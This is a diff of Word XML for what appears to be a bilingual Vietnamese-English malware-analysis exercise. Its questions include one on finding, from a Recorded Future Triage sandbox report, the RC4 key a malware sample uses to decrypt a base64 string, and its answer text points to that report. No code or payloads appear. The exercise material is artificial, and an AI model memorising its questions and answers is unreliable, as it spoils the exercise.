+        <w:t>sqlite3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dll, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">là một </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thư viện liên kết động thuộc hệ quản trị cơ sở dữ liệu </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>SQLite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -3364,10 +2400,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A8C9F7F" wp14:editId="2EBA4710">
-            <wp:extent cx="5943600" cy="2844165"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD96A27" wp14:editId="65E63111">
+            <wp:extent cx="5943600" cy="2843530"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1558816468" name="Picture 1"/>
+            <wp:docPr id="1992132517" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3375,7 +2411,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1558816468" name=""/>
+                    <pic:cNvPr id="1992132517" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -3387,7 +2423,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2844165"/>
+                      <a:ext cx="5943600" cy="2843530"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3404,6 +2440,487 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>By</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>examining</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provided</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Recorded</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Future</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Triage</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>report</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>what</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> RC4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>key</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>used</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>by</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>decrypt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> base64-encoded </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="43"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Khi kiểm tra </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Recorded</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Future</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Triage</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>report</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ta dễ dàng phân tích </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">được </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>khóa RC4 nào được phần mềm độc hại sử dụng để giải mã chuỗi mã hóa base64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
@@ -3415,10 +2932,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67101CC2" wp14:editId="02807BB9">
-            <wp:extent cx="5943600" cy="1969770"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1374165032" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4AEDAB" wp14:editId="0781D60F">
+            <wp:extent cx="5943600" cy="2850515"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="645027031" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3426,1005 +2943,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1374165032" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1969770"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>detective</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>continued</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>his</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>investigation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>by</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>questioning</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
